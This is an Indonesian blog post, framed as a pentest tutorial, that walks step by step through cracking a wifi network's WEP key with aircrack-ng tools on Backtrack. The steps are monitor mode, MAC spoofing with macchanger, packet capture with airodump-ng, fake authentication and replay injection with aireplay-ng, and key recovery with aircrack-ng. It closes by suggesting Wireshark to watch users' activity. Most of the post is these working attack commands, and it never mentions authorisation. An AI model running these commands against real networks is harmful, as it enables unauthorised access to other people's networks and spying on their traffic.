Pentest Access Point Dengan Linux

Open Source Sehat

    Kembali ke kisah lama dulu kawan, tiba-tiba pengen nulis. Kali ini saya pingin share tentang wifi crack, WEP pass key. walaupun belum tentu 100% berhasil, tapi ini boleh dicoba. Karena langkah-langkah yang akan saya share disini juga berguna untuk problem lain. Title yang enak mungkin Pentest wifi kali ya.
Oh iya, saya sarankan pake Backtrack, versi berapapun. Tapi disarankan versi 5 ke atas, karena Remasteran ubuntu ini sangat cocok banget buat mainan pentest. Langsung pada langkah-langkahnya

  Disini saya ibaratkan semua paket yang diperlukan sudah terinstall dengan rapi dan oke. Karena secara umum paket-paket yang dibutuhkan disini sudah ada pada backtrack. kalo misal belum ketikkan saja di console "sudo apt-get install aircrack-ng" tanpa tanda kutip.

NB : disini saya menggunakan laptop dengan 1 wifi internal, yang sudah
         terdeteksi dan siap digunakan.
  1. Yang pertama kita coba mainkan tool, airmon-ng
    airmon-ng digunakan untuk membuat fake wifi, jadi ntar fake wifi atau duplikat wifi dari yang asli akan digunakan buat scan, dan macnya juga bisa kita ganti nanti.
    Perintah yg digunakan
    > disable wifi dulu
       #ifconfig wlan0 down
       #airmon-ng start wlan0
    NB : nanti akan muncul mon0 setelah melakukan perintah diatas, yang
             nanti kita gunakan buat scan
    #ifconfig mon0 down
    #macchanger --mac <fake make> mon0
    #ifconfig mon0 up "buat ngaktifin mon0/fake wifinya dgn mac beda"
  2. airodump-ng, digunakan untuk scan AP baik hidden ataupun unhidden dll.
    #airodump-ng wlan0
    #airodump-ng -c <channel> -w <file name> --bssid <bssid> <wificard>
      NB : -c untuk channel target
              -w output file untuk memunculkan hasilnya
              -bssid ada setelah kita gunakan perintah yang pertama, bssid
               target
  3. aireplay-ng, untuk melakukan replay atau timbal balik, aireplay-ngdigunakan untuk memancing si host dari sebuah AP atau hotspot melakukan tes koneksi atau ping secara sederhanannya.
    #aireplay-ng -1 0 -a <bssid> -h <fakemake> -e <essid> <wlancard>
      NB : - "-1 0" menyesuaikan serangan dari fake authentication, 0 adalah
                 delay untuk respond dari target
               - buka console baru lagi,jangan tutup proses ini. karena ini adalah
                 bridge untuk mecapai serangan puncak dalam bahasa kerenya.
               - -e <essid> => SSID dari AP target
               - -l => set source IP in fragments
               - -h => set mac address kita
               - -a bssid => set AP MAC address
    #aireplay-ng -3 -b <bssid> -h <fake mac> <wlancard>
      NB : cracking dapat dilanjutkan kalo traffic data sampai 10.000/ 10 kb
              - -h => set mac address kita
  4. Buka console lagi, dengan diatas berarti ada 3 proses yang sedang berjalan, masukkan perintah
    #aircrack-ng -b <bssid> <file_name>
      NB : file_name adalah file data yang kita buat tadi dari proses kedua
NB : - if Data overlow from 10.000 wifi crack bakal failed
        - ping data dari client akan cepat menambah daa jadi buka wireshark
          untuk melihat activitas user

0 comments: